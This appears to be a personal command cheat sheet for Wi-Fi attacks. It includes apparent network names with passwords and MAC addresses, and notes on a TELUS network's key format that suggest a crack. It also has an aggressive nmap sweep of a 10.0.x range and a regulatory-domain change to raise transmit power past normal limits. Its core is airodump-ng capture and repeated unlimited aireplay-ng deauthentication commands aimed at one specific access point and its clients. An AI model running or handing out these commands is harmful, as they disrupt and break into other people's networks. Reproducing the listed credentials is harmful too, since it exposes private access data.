FBI_VAN-78MAC
metroidprime2

RECKLESS_MXANALOG
38:3F:B3:E5:6C:C4
*#95DeKaBrA

$ nslookup chalister.ca
## 3.84.103.243

$ nmap -v -A -iL <listofhosts/networks> 10.0.<0-255>.<1-254>

$ systemctl start NetworkManager $$ wpa_supplicant

TELUS1702
10:78:5B:E4:90:12
Ch 1
Freq: 2412 5411
IEEE 802.11b+
CCK encoding
WPA+PSK
WPA+AES-CCM

10 digits
numbers and lowercase (% and @)

iw reg set BO
iwconfig wlan0 txpower 30

ifconfig wlan0 down
ifconfig wlan0 up
iwconfig wlan0 channel 13
iwconfig wlan0 txpower 30

airodump-ng --channel 6  --output-format pcap -w /root/airodumps/0722
airodump-ng wlan0
airodump-ng --bssid --essid

aireplay-ng -a BC:2E:48:11:EC:E7 --deauth 0 wlan1mon
aireplay-ng -a BC:2E:48:11:EC:E7 --deauth 0  -c A8:66:7F:03:BF:C2 wlan1mon
aireplay-ng --deauth 0 -c 00:9D:6B:18:8C:6C wlan1mon
aireplay-ng -a BC:2E:48:11:EC:E7 --deauth 0  -c 34:79:16:FF:EF:F5 wlan1mon
aireplay-ng -a BC:2E:48:11:EC:E7 --deauth 0  -c 00:9D:6B:18:8C:6C wlan1mon

airmon-ng check wlan0
airmon-ng check kill
airmon-ng start wlan0

iw reg set BO

iw event
	-f (auth/assoc/deauth/disassoc frames)
	-t (timing)
iw dev wlan0 link
			 station dump
			 		 get <peer-MAC-address>/<AP-MAC-address>
			 set txpower <auto|fixed|limit>
			 set power_save on
			 get power_save
iw phy <phyname> set txpower <auto|fixed|limit> [<tx power in mBm>]
iw wlan0 connect <ap_name> [keys] <frequency>
		 set bitrates legacy-2.4 12 18 24
		 						 6  12 24 (Purge G)
		 			  mcs-5 4
		 			  mcs-2.4 10
		 			  mcs-2.4 (clear)
		 			  mcs-5 (clear)

<power in mBm> = 100 * <power in dBm>

iw phy <hw_phy_name> interface add <interface_name> type <mode>

ip link